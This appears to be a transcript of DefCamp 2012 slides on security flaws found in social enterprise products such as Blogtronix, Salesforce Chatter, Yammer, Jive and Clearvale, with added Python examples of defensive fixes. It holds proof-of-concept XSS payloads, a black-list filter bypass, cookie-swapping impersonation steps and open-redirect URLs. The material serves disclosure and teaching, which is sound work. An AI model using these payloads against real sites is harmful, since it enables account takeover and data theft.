
Social Enterprise Rises! …and so are the Risks - DefCamp 2012


  1. Social Enterprise Software Rises! …and so are the Risks
     Marian Ventuneac (marian.ventuneac@gmail.com, @mventuneac)
  2. About myself
     - Security Architect
     - International presenter
     - Member of OWASP and ISACA global organizations
     - OWASP Ireland Limerick Chapter Leader: https://www.owasp.org/index.php/Ireland-Limerick
     - Security Researcher, PhD, MEng
     - http://www.ventuneac.net
     - http://secureappdev.blogspot.com
     - http://dcsl.ul.ie
     An Introduction to Web Application Security Risks
  3. Agenda
     - Social Enterprise Software: What, Why, and How?
     - Social Enterprise Software & Risks
     - Thoughts on Calculated Risk
     - Social Enterprise Software & Risks (some case studies)
     - Final Thoughts
  4. Social Enterprise Software: What?
     - Social Enterprise / Social Enterprise Networks / Social Enterprise Software
     - Enterprise solutions providing Facebook-like social networking functionality
     - 'social networking' + 'enterprise software' = 'social enterprise networking'
  5. Social Enterprise Software: Why?
     - Improve communication and increase work efficiency
       - internal collaboration
       - establish teams, communities or informal groups
       - share knowledge and learn from other people's experiences
       - social networking
       - external collaboration with partners
       - …
     - Used by employees and by external customers, suppliers and partners
  6. Social Enterprise Software: Deployment models
     - On-premise solutions
       - Deployed inside the enterprise network, usually controlled and managed by the client
     - Public Cloud-based solutions
       - Software as a Service (SaaS): hosted and administered by the vendor
     - Hybrid deployments
     - Usually open to allow external collaboration
       - customers, suppliers, third-party contractors, etc.
  7. Social Enterprise Software: Some of the Risks
     - Potential loss of enterprise data
       - Understand what type of data needs to be uploaded there
       - Do you know/control what data is actually being shared?
     - Exploitation of common application vulnerabilities
     - Phishing attacks, social engineering
     - Viruses and malware
     - Cloud-based solutions: various compliance and security concerns
       - Do you know where your data is stored?
  8. Common Strategies for Risk Mitigation
     - Vendor/supplier due diligence
     - Security policies (generic/dedicated)
     - Security processes & procedures
       - Control the data being shared (data classification)
       - Verify the identity of users accessing the data (authentication)
       - Control user access to data
       - Approve/Create/Lock user accounts (accounts management)
       - Remote wipe (for mobile devices: smartphones, tablets, etc.)
       - …
  9. Calculated Risks
  10. Calculated Risks (cont)
     - Business requirement: WE (the company) need social enterprise software X for Y and Z reasons.
     - IT Security (most likely take on it):
       - Scenario 1: No, there is too much risk to take!
       - Scenario 2: Yes - We trust our partners and their choices.
       - Scenario 3: Yes - IF the Business ASSUMES ALL THE RISKS…
       - Scenario 4: Let's take a closer look at it…
       - Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)
  11. Let's Take a Closer Look
     - Software defects leading to exploitation of security vulnerabilities
       - OWASP Top 10 Security Risks
       - CWE/SANS Top 25 Programming Errors
     - Vendor size: a plus, but it doesn't guarantee the chosen solution is vulnerability free
     - It is safe to assume there is no application that is 100% secure
     - If anyone claims such a thing, can they provide reasonable proof?
  12. Let's Take a Closer Look (cont)
     - Trust but verify
       - Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)
       - Manual security testing
       - Automated security testing
       - Responsible disclosure
     - Most likely you will not be disappointed
  13. The Closer Look (cont)
     - A practical take on assessing the security of social enterprise software solutions
     - Some of the chosen ones
  14. The Closer Look (cont)
     - Assessment criteria including tests for
       - Cross-Site Scripting (XSS)
       - Insecure Direct Object Reference
       - Security Misconfiguration
       - Failure to Restrict URL Access
       - Unvalidated Redirects and Forwards
       - Logical Flaws
       - …
  15. Blogtronix Enterprise
     Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
     CVE-2011-1039 - Multiple XSS Vulnerabilities
     - Persistent (partially) XSS via Search functionality (auth. user)
       HTTP request:
         http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0
       HTTP response:
         …
         <a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&amp;sub=1&amp;tab=0"><script>alert(docume...</a> </span> <span style="…
  16. Blogtronix Enterprise (cont)
     CVE-2011-1039 - Multiple XSS Vulnerabilities
     - Reflected XSS in login page via arbitrary parameter
       HTTP request:
         https://test_site/pages/login/?a"><script>alert(document.cookie)</script>
       HTTP response:
         <form method="post" action="/pages/login/?a"><script>alert(document.cookie)</script>" id="aspnetForm">
     - Multiple Reflected XSS via existing and arbitrary parameters of existing resources
  17. Blogtronix Enterprise (cont)
     Insecure Direct Object Reference (variant)
     - Valid user A can potentially impersonate another user B
     - Tamper with the value of the userAccountID_http://test_site/ cookie (ASP.NET GUID)
       1. At login time, replace the value of the userAccountID_ cookie with the one matching user B
       2. Do something noticeable (post a message in group X) and log out
       3. As authenticated user A, review user B's recent activity: user B appears as a recent visitor of group X
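The root cause on this slide is that the server believes a user identifier it hands to the client and accepts it back unchecked. The following is an added example (not Blogtronix code; cookie layout, secret and GUIDs are constructed) showing the minimal server-side fix: the identifier is bound to a keyed MAC and an issue time, so a cookie whose GUID has been swapped for another user's fails verification and is treated as unauthenticated. Keeping the identity only in a server-side session is the stronger option; this shows the check a server must do if it insists on a client-visible identifier.

```python
import hashlib
import hmac
import time
from typing import Optional

# Assumed server-side secret; in a real deployment it comes from a key store and never leaves the server.
SERVER_KEY = b"constructed-example-key-not-for-production"

# Constructed GUIDs standing in for the ASP.NET userAccountID values of users A and B
USER_A = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"
USER_B = "7c9e6679-7425-40de-944b-e07fc1f90ae7"


def _mac(payload: str, key: bytes) -> str:
    return hmac.new(key, payload.encode("utf-8"), hashlib.sha256).hexdigest()


def issue_identity_cookie(user_account_id: str, issued_at: Optional[int] = None,
                          key: bytes = SERVER_KEY) -> str:
    """Return 'guid|issued_at|mac'. The MAC covers both fields, so neither can change unnoticed."""
    issued_at = int(time.time()) if issued_at is None else issued_at
    payload = f"{user_account_id}|{issued_at}"
    return f"{payload}|{_mac(payload, key)}"


def verify_identity_cookie(cookie: str, key: bytes = SERVER_KEY, max_age: int = 8 * 3600,
                           now: Optional[int] = None) -> Optional[str]:
    """Return the GUID if the cookie is intact and fresh; None means 'not authenticated'."""
    try:
        guid, issued_at, mac = cookie.split("|")
        issued_at_int = int(issued_at)
    except ValueError:
        return None
    # Constant-time comparison: a plain == would leak how many MAC bytes matched.
    if not hmac.compare_digest(mac, _mac(f"{guid}|{issued_at}", key)):
        return None
    now = int(time.time()) if now is None else now
    if now - issued_at_int > max_age:
        return None
    return guid


def swap_guid(cookie: str, other_guid: str) -> str:
    """Model the tampering step on the slide: keep the rest of the cookie, replace only the GUID."""
    _, issued_at, mac = cookie.split("|")
    return f"{other_guid}|{issued_at}|{mac}"


def demo() -> dict:
    """Issue a cookie for user A and show what the server concludes for the genuine and the swapped one."""
    t0 = 1_700_000_000  # constructed fixed clock so the result is reproducible
    genuine = issue_identity_cookie(USER_A, issued_at=t0)
    return {
        "genuine": verify_identity_cookie(genuine, now=t0 + 60),
        "swapped_to_B": verify_identity_cookie(swap_guid(genuine, USER_B), now=t0 + 60),
        "expired": verify_identity_cookie(genuine, now=t0 + 9 * 3600),
    }


if __name__ == "__main__":
    print(demo())
```

The same GUID the slide describes being replaced now yields `None`, so the request is handled as anonymous instead of as user B. Rotating the key invalidates every outstanding cookie, which is the usual emergency lever if the key is suspected to have leaked.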
  18. Blogtronix Enterprise (cont)
     Security Misconfiguration
     - Enumerate valid user IDs
       - Unauthenticated attacker checks for https://test_site/users/user_id
       - if user_id exists, redirected to login
       - if not, a custom error is displayed
     - Enumerate valid groups
       - Unauthenticated attacker checks for https://test_site/group_id/pages/people/
       - if group_id exists, redirected to login
       - if not, a custom error is displayed
  19. Blogtronix Enterprise (cont)
     Improper Error Handling
  20. Blogtronix Enterprise (cont)
     CVE-2011-1040 - Unvalidated Redirects
     - https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f
     - Once the user logs in, he/she gets redirected to the resource previously stated via the ReturnUrl parameter
     CVE-2011-1041 - Failure to restrict access to protected resources
     - Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.
     - Attacker knows hashed user ID => user profile picture can be accessed without auth.
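For the ReturnUrl issue the fix is on the login handler: only follow a post-login target that stays on the application itself. The check below is an added example (not Blogtronix code; the landing page path and the sample inputs are constructed). It goes a little beyond the slide's absolute-URL case and also rejects protocol-relative, backslash and scheme-only forms, because browsers treat those as off-site too.

```python
from urllib.parse import unquote, urlsplit

DEFAULT_LANDING = "/Home/"  # constructed: where the app sends users when ReturnUrl is unusable


def safe_return_url(raw: str, default: str = DEFAULT_LANDING) -> str:
    """Return the ReturnUrl only if it is an absolute path on this host; otherwise the default page."""
    if not raw:
        return default
    # The slide shows the value arriving percent-encoded (http%3a%2f%2f...), so decode first.
    candidate = unquote(raw)
    # Control characters could split the Location header or be silently dropped by a browser.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate):
        return default
    # Browsers treat a backslash as a slash, so "/\evil" would become "//evil" client-side.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default  # absolute URL (http://...), scheme-only (javascript:) or //host form
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default  # must be a single-slash absolute path
    return candidate


def login_redirect_target(return_url_param: str) -> str:
    """What the login page should put in its Location header after a successful login."""
    return safe_return_url(return_url_param)


if __name__ == "__main__":
    for sample in ("http%3a%2f%2fwww.google.co.uk%2f", "/Home/pages/search/?search=abc&sub=1", "//www.google.co.uk/"):
        print(sample, "->", login_redirect_target(sample))
```

An allow-list of known application paths is stricter still and is the better choice when the set of landing pages is small; the path check above is the general form that applies when it is not.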
  21. Salesforce Chatter SaaS
     Multiple persistent XSS vulnerabilities
     - via user profile first & last name
       <a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam&quot; onmouseover=&quot;alert(1)&quot; Cole</a>
     - via group name
       <a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover=&quot;alert(3)&quot;</a>
  22. Salesforce Chatter SaaS (cont)
     Improper User Input Validation
     - File Sharing: CR LF symbols accepted into the file title (via SaaS solution)
       POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1
       Host: eu1.salesforce.com
       …
       Content-Disposition: form-data; name="title"

       arv_test52%0a%0d%0a
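A title is display text, so the server-side rule is simple: no control characters at all, not just CR and LF. The validator below is an added example (not Salesforce code; the length limit is a constructed choice) that decodes the value the way the slide shows it arriving and reports the first offending character.

```python
import unicodedata
from typing import Optional, Tuple
from urllib.parse import unquote

MAX_TITLE_LEN = 255  # constructed limit for the example

# Line and paragraph separators are category Zl/Zp, not Cc, so they are listed explicitly.
_EXTRA_BREAKS = {"\u2028", "\u2029"}


def validate_title(raw: str, percent_encoded: bool = True) -> Tuple[bool, Optional[str], Optional[str]]:
    """Return (ok, reason, normalised_title).

    percent_encoded=True mirrors the slide, where the title reaches the server as arv_test52%0a%0d%0a;
    set it to False when the framework has already decoded the form field.
    """
    title = unquote(raw) if percent_encoded else raw
    if not title.strip():
        return False, "empty title", None
    if len(title) > MAX_TITLE_LEN:
        return False, "title too long", None
    for ch in title:
        # Cc covers CR, LF, TAB, NUL, ESC and the C1 range (including NEL, U+0085).
        if unicodedata.category(ch) == "Cc" or ch in _EXTRA_BREAKS:
            return False, f"control character U+{ord(ch):04X} not allowed", None
    return True, None, title.strip()


if __name__ == "__main__":
    for sample in ("arv_test52", "arv_test52%0a%0d%0a", "  Q3 report.pdf "):
        print(repr(sample), "->", validate_title(sample))
```

Rejecting rather than stripping is deliberate: silently removing the characters would hide a client bug or a probing attempt that the application's logs should record.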
  23. Salesforce Chatter Desktop
     Improper Error Handling leading to Information Disclosure
     - submitting comments for nonexistent posts
       HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1
       Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149\nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}
     - attempting to 'like' a nonexistent post
       HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1
       Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDLIKE", line 156\nORA-06512: at "DOPEY.CFEEDLIKE", line 217\nORA-06512: at "DOPEY.CFEEDLIKE", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}
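The responses on this slide hand the client the database schema name, package names and line numbers. The pattern that prevents this is a single error boundary that logs the full exception server-side under a correlation reference and returns only a generic message plus that reference. The code below is an added example (not Salesforce code): the feed store, the backend exception and its message are constructed to resemble the slide's output so the test can show none of it reaches the client.

```python
import json
import logging
import uuid
from typing import Tuple

log = logging.getLogger("feed.api")

# Constructed in-memory feed standing in for the backend: post id -> list of comments
FEED = {"0D5D0000000Abcd": []}


class BackendError(Exception):
    """Stands in for the database-layer exception whose text the slide shows leaking."""


class NoDataFound(BackendError):
    """Raised when the referenced post does not exist."""


def backend_insert_comment(post_id: str, text: str) -> int:
    if post_id not in FEED:
        # Constructed message imitating the leaked stack on the slide; must never reach a client.
        raise NoDataFound('NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149')
    FEED[post_id].append(text)
    return len(FEED[post_id])


GENERIC_MESSAGES = {404: "Resource not found", 500: "Internal error"}


def error_response(status: int, exc: Exception) -> Tuple[int, str]:
    """Log the real cause with a reference id; return a body that carries only status, generic text and the id."""
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s status=%d %s: %s", ref, status, type(exc).__name__, exc)  # detail stays server-side
    body = {"status": status, "msg": GENERIC_MESSAGES.get(status, "Error"), "ref": ref}
    return status, json.dumps(body)


def post_comment(post_id: str, text: str) -> Tuple[int, str]:
    """Handler for /<post_id>/comments.json: every backend failure passes through error_response."""
    try:
        count = backend_insert_comment(post_id, text)
    except NoDataFound as exc:
        return error_response(404, exc)
    except Exception as exc:  # any other failure, including ones we did not anticipate
        return error_response(500, exc)
    return 201, json.dumps({"status": 201, "comments": count})


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    print(post_comment("0D5D00000000000", "hello"))   # id from the slide; does not exist here
    print(post_comment("0D5D0000000Abcd", "hello"))   # constructed existing post
```

Support staff can look up the `ref` in the server log to get the stack; the client never sees it. A regression test that greps every error body for strings such as `ORA-` or a schema name is a cheap guard against someone later re-adding `str(exc)` to the response.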
  24. Yammer
     Persistent XSS via group name
     HTTP POST request:
       /ventuneac.net/groups HTTP/1.1
       Host: www.yammer.com
       …
       -----------------------------295562556131627
       Content-Disposition: form-data; name="group[name]"

       a4" onmouseover="alert(4)"
       -----------------------------295562556131627
     HTTP response (home page):
       GET /ventuneac.net/ HTTP/1.1
       Host: www.yammer.com
       …
       <a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">
  25. Jive
     Persistent XSS via group name (create/edit)
     HTTP POST request:
       POST /create-group.jspa HTTP/1.1
       Host: ventuneac.jiveon.com
       …
       -----------------------------215202979014924
       Content-Disposition: form-data; name="description"

       group2"><script>alert(1)</script>
       -----------------------------215202979014924
     HTTP response (load group from Places):
       GET /groups/group2 HTTP/1.1
       Host: ventuneac.jiveon.com
       …
       <meta name="description" content="group2"><script>alert(1)</script>" />
  26. BroadVision Clearvale SaaS
     Multiple persistent XSS vulnerabilities
     - via user profile first & last name & search page
       <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">m&quot; style=&quot;xss:expr/*XS...</a>
     - via group name & search page
       <a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a>
  27. BroadVision Clearvale SaaS (cont)
     The broken fix for the user profile name XSS issue
     - Black-list user input validation
       - style followed by = becomes style00 (style=, style =, etc.)
       - document.location followed by ( becomes document.location00
       - alert followed by ( becomes 00
       - /* becomes /0* for the first instance only
       - */ becomes *0/
       - …
     - Improper output escaping
  28. BroadVision Clearvale SaaS (cont)
     The broken fix for the user profile name XSS issue
     - Bypassing the Clearvale XSS filter
       XSS payload:
         firstname: m" style
         lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa))
       HTTP response:
         …
         <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a>
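Slides 21, 24, 25 and 26 all place a user-supplied name into an HTML attribute without encoding, and slides 27 and 28 show why a black list does not repair that. The code below is an added example (not Clearvale or Salesforce code): it reconstructs the black-list rules exactly as slide 27 lists them, assumes they were applied to each profile field separately before the fields were joined (which is what the split first/last name payload on slide 28 exploits), and renders the same names both that way and with HTML-attribute encoding. A small parser then reports which attributes a browser would actually see on the link, using only the payloads already shown on the slides.

```python
import html
import re
from html.parser import HTMLParser
from typing import Callable, Dict, Optional, Set


def blacklist_filter(value: str) -> str:
    """Reconstruction of the slide 27 rules; assumed to run on each field separately."""
    value = re.sub(r"style\s*=", "style00", value, flags=re.IGNORECASE)          # style=, style = ...
    value = re.sub(r"document\.location\s*\(", "document.location00", value, flags=re.IGNORECASE)
    value = re.sub(r"alert\(", "00", value, flags=re.IGNORECASE)                 # alert followed by (
    value = value.replace("/*", "/0*", 1)                                        # first instance only
    value = value.replace("*/", "*0/", 1)
    return value


PROFILE_HREF = "/pg/profile/3"  # path taken from the slide's response


def render_with_blacklist(first: str, last: str) -> str:
    """The broken fix: filter per field, then drop the joined name unescaped into an attribute and text."""
    name = f"{blacklist_filter(first)} {blacklist_filter(last)}"
    return f'<a href="{PROFILE_HREF}" title="{name}">{name}</a>'


def render_with_encoding(first: str, last: str) -> str:
    """The hardened form: no black list; the value is HTML-encoded (quotes included) at output time."""
    name = html.escape(f"{first} {last}", quote=True)
    return f'<a href="{PROFILE_HREF}" title="{name}">{name}</a>'


class _FirstAnchor(HTMLParser):
    """Collects the attributes the browser would see on the first <a> element."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: Optional[Dict[str, Optional[str]]] = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)


def anchor_attributes(markup: str) -> Dict[str, Optional[str]]:
    parser = _FirstAnchor()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def injected_attributes(first: str, last: str, renderer: Callable[[str, str], str]) -> Set[str]:
    """Attribute names on the rendered link beyond the two the template itself declares."""
    return set(anchor_attributes(renderer(first, last))) - {"href", "title"}


# Names exactly as shown on slides 21 and 28 (first name, last name)
CHATTER_NAME = ('Adam" onmouseover="alert(1)"', "Cole")
CLEARVALE_NAME = ('m" style', '="/**/;xss:expr/**/ession(alert/**/(aaa))')


if __name__ == "__main__":
    for label, name in (("chatter", CHATTER_NAME), ("clearvale", CLEARVALE_NAME)):
        print(label, "blacklist ->", sorted(injected_attributes(*name, render_with_blacklist)))
        print(label, "encoded   ->", sorted(injected_attributes(*name, render_with_encoding)))
```

Two things fall out of running it. The black list does rewrite `alert(` in the Chatter name, yet an `onmouseover` attribute still appears on the link, because the rules never address the `"` that closes the attribute; and the split Clearvale payload passes every rule untouched since no single field contains `style=`. Attribute encoding handles both without knowing anything about the payloads, which is the point of fixing the output context rather than filtering input.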
  29. Knowing What 'private' Really Means
     - Social Enterprise Software usually provides document sharing/publishing functionality
       - Private (not shared with anyone – default option)
       - Shared with private (locked) groups/members
       - Shared with public groups
       - Shared with everyone (shared via public link)
     - In certain conditions, the private documents can become… less private
  30. AntiVirus & anti-malware file scanning
     - BroadVision Clearvale has a built-in AV scanning engine
     - The rest of the tested solutions currently lack such capabilities
     - Yammer and Salesforce plan to add AV file scanning
     - No malicious files were used for testing AV capabilities
  31. The Closer Look: Summary
     - Common security vulnerabilities, which can be easily exploited
     - User-shared information is not properly validated and sanitised
       - A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc.
       - Where such user-controlled data is seen/accessed by other users, their accounts can easily get compromised
     - Exploitation of such vulnerabilities could severely compromise the security of enterprise data
  32. Final Thoughts
     - Even if the vendor is a market leader, it doesn't necessarily mean they get application security right
     - Dare to ask for proofs of application security. Trust but verify
     - Vendor due diligence, social enterprise software related security policies & security procedures, etc.
     - Interested in this kind of benchmarks? OWASP Security Baseline Project: https://www.owasp.org/index.php/OWASP_Security_Baseline_Project
  33. Thank You
     marian.ventuneac@gmail.com, @mventuneac
